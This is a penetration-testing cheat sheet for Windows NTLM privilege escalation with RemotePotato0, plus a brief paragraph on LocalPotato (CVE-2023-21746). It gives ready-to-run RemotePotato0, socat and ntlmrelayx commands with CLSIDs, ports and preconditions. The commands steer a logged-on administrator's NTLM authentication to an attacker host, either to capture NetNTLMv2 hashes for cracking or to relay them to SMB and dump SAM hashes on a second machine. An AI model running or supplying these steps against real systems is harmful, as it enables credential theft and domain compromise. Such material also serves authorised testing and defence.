NTLM elevation of privilege
RemotePotato0
Windows privilege escalation from a low-privileged user to Domain Admin with NTLM relay. RemotePotato0 (by antonioCoco and decoder) triggers a DCOM activation inside another user's interactive session; the OXID resolution for that activation is pointed at an attacker-controlled address, so the victim's DCOM client ends up authenticating with NTLM to an RPC server run by the tool. That authentication is either captured as a NetNTLMv2 response for offline cracking (module 2, this section) or relayed cross-protocol over HTTP and on to SMB via ntlmrelayx (module 0, next section).
Capture a logged-on user's NetNTLMv2 response (module 2). Nothing is relayed in this mode; the tool prints the response for offline cracking.
Very effective on e.g. a terminal server where administrators or Domain Admins have interactive sessions. The attacker only needs a shell on the same host as an ordinary user; list the sessions and their IDs with query user (qwinsta) to pick the -s value.
On the target system (from the low-privileged session):
RemotePotato0.exe -m 2 -r <ATTACKER-IP> -x <ATTACKER-IP> -s <SESSION-ID> -c <CLSID DEPENDING ON OS>
e.g. CLSID: 5167B42F-C111-47A1-ACC4-8EABE61B0B54 (the tool's default). The CLSID must be a DCOM class that the OS in hand activates in the targeted session; if the trigger does not fire, try another one from the per-OS list in the project README.
-x is the address the victim's DCOM client is sent to for OXID resolution and -s is the session ID of the user whose authentication you want. The tool's rogue OXID resolver listens on the target on port 9999 unless changed with -p.
On attacker system:
socat TCP-LISTEN:135,fork,reuseaddr TCP:<TARGET-IP>:9999
The DCOM client always contacts port 135 for OXID resolution and a non-admin cannot bind 135 on the target (RPCSS owns it), so the attacker host bounces the connection back to the rogue resolver on the target's port 9999. Listening on 135 requires root on the attacker box.
Relaying NTLM to SMB to dump the local hives of a second system on which the relayed user is a local administrator
On target system:
RemotePotato0.exe -m 0 -r <ATTACKER-IP> -x <ATTACKER-IP> -p 9999 -s <SESSION-ID> -c <CLSID>
e.g. CLSID: F8842F8E-DAFE-4B37-9D38-4E0714A61149
Module 0 is the RPC-to-HTTP relay: the NTLM exchange received by the tool's RPC server is forwarded over HTTP to the host given with -r, where ntlmrelayx must be listening; -x and -p are the rogue OXID resolver address and port as above.
On attacker system:
socat TCP-LISTEN:135,fork,reuseaddr TCP:<TARGET-IP>:9999
ntlmrelayx.py -t <SECOND-TARGET-IP> -smb2support
ntlmrelayx takes the authentication on its HTTP listener (port 80 by default) and relays it to SMB on <SECOND-TARGET-IP>; when the relayed user is an administrator there, it dumps the SAM hashes by default. Check two things before running it: the relayed user must be a local admin on the second target, and the second target must not require SMB signing (domain controllers require it by default, member servers and workstations usually do not). Relaying back to <TARGET-IP> itself does not work, since NTLM reflection to the originating host has been blocked since MS08-068.
LocalPotato
CVE-2023-21746 (Windows NTLM Elevation of Privilege Vulnerability, fixed in the January 2023 security updates): a flaw in NTLM local authentication lets a local authenticated user, by running a specially crafted program, swap its own authentication context for that of a privileged account. The result is an arbitrary file write as SYSTEM through the local SMB server, which, chained with a file-based code-execution primitive, yields SYSTEM privileges. It only works on hosts that lack the January 2023 or a later cumulative update, so check the patch level first.